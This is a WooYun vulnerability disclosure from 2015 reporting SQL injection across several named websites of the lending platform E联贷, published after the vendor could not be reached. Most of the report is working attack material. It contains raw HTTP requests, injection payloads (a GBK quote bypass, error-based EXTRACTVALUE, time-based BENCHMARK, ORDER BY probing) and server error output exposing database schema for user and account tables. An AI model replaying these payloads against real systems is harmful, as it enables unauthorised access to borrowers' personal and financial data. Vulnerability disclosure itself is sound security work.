当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105315

漏洞标题:E联贷通杀SQL注入漏洞

相关厂商:E联贷

漏洞作者: 路人甲

提交时间:2015-04-03 16:48

修复时间:2015-05-18 16:50

公开时间:2015-05-18 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入

详细说明:

目前发现所有E联贷网站都有注入漏洞

漏洞证明:

http://www.eldzz.com/
http://www.eldzb.com/
http://www.eldqd.com/
http://www.eldqd.net/
http://www.eldshop.com/
注入1:
POST http://www.eldzz.com/index.php?user&q=action/login HTTP/1.1
Host: www.eldzz.com
Connection: keep-alive
Content-Length: 50
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.eldzz.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.eldzz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
keywords=admin%bf')&password=admin&submit=%B5%C7+%C2%BC
Place: POST
Parameter: keywords
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: keywords=admin%bf') AND EXTRACTVALUE(4685,CONCAT(0x5c,0x71756b7071,(SELECT (CASE WHEN (4685=4685) THEN 1 ELSE 0 END)),0x71716d6871))-- TVnM&password=admin&submit=%B5%C7 %C2%BC
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [1]:
[*] eldzz
注入2:
POST http://www.eldzz.com/index.php?user&q=action/check_valid_user HTTP/1.1
Host: www.eldzz.com
Connection: keep-alive
Content-Length: 67
Accept: text/plain, */*; q=0.01
Origin: http://www.eldzz.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://www.eldzz.com/index.php?user&q=action/reg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
user&q=action/check_valid_user&param=admin@gmail.com%bf'&name=email
返回:
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 16:24:39 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 236
Connection: close
Content-Type: text/html;charset=GB2312
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin@gmail.com縗''' at line 1执行SQL语句错误!select * from dw_user where email='admin@gmail.com縗''
Place: POST
Parameter: param
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment)
Payload: user&q=action/check_valid_user&param=admin@gmail.com%bf' AND 2277=BENCHMARK(5000000,MD5(0x645a6763))#&name=email
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
current database: 'eldzz'
注入3:
POST http://www.eldzz.com/index.php?user&q=action/getpwd HTTP/1.1
Host: www.eldzz.com
Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.eldzz.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.eldzz.com/index.php?user&q=action/getpwd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
email=admin%40gmail.cn%bf'&username=admin&valicode=1768
返回:
HTTP/1.1 200 OK
Date: Wed, 01 Apr 2015 16:33:26 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 599
Connection: close
Content-Type: text/html;charset=GB2312
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin@gmail.cn縗''' at line 6执行SQL语句错误!select p2.name as typename,p2.type,p3.*,p4.*,p5.*,p1.* from `dw_user` as p1
left join `dw_user_type` as p2 on p1.type_id = p2.type_id
left join `dw_user_cache` as p3 on p3.user_id = p1.user_id
left join `dw_account` as p4 on p4.user_id = p1.user_id
left join `dw_userinfo` as p5 on p5.user_id = p1.user_id
where 1=1 and p1.username = 'admin' and p1.email = 'admin@gmail.cn縗''
注入4:
http://www.eldshop.com/invest/index.html?city=&use=247'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and p1.use in (247')' at line 9执行SQL语句错误!select count(1) as num from `dw_borrow` as p1 left join `dw_user` as p2 on p1.user_id=p2.user_id left join `dw_user_cache` as uca on uca.user_id=p1.user_id left join `dw_user` as u on u.user_id=uca.kefu_userid left join `dw_credit` as p3 on p1.user_id=p3.user_id left join `dw_credit_rank` as p4 on p3.value<=p4.point2 and p3.value>=p4.point1 left join `dw_userinfo` as p5 on p1.user_id=p5.user_id left join `dw_daizi` as p6 on p1.id=p6.borrow_id where 1=1 and p1.showstate!=1 and p1.id>='17755' and (p1.status=1 or p1.status=3) and p1.use in (247') and p1.use in (247')
注入5;
http://www.eldzz.com/tools/index.html?keywords=a&account1=0&account2=&province=&city=1'/**/or/**/1=1--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/**/or/**/1 and p1.account >= 0' at line 9执行SQL语句错误!select count(1) as num from `dw_borrow` as p1 left join `dw_user` as p2 on p1.user_id=p2.user_id left join `dw_user_cache` as uca on uca.user_id=p1.user_id left join `dw_user` as u on u.user_id=uca.kefu_userid left join `dw_credit` as p3 on p1.user_id=p3.user_id left join `dw_credit_rank` as p4 on p3.value<=p4.point2 and p3.value>=p4.point1 left join `dw_userinfo` as p5 on p1.user_id=p5.user_id left join `dw_daizi` as p6 on p1.id=p6.borrow_id where 1=1 and p1.id>='' and (p1.status=1 or p1.status=3) and (p1.name like '%a%' or u.username like '%a%') and p2.city =1'/**/or/**/1 and p1.account >= 0
去单引号正常查询
注入6:
http://www.eldzz.com/bbs/index.html?q=forums&fid=2'/**/and/**/1=1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 4执行SQL语句错误!select p1.* from `dw_bbs_topics` as p1 left join dw_bbs_forums as p2 on p2.id = p1.fid left join dw_bbs_posts as p3 on p3.tid = p1.id where p1.id=48'
去单引号正常查询...
注入7:
http://www.eldzz.com/bbs/index.html?q=view&tid=48/**/order/**/by/**/100--
返回:
Unknown column '100' in 'order clause'执行SQL语句错误!select p1.* from `dw_bbs_topics` as p1 left join dw_bbs_forums as p2 on p2.id = p1.fid left join dw_bbs_posts as p3 on p3.tid = p1.id where p1.id=48/**/order/**/by/**/100--

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝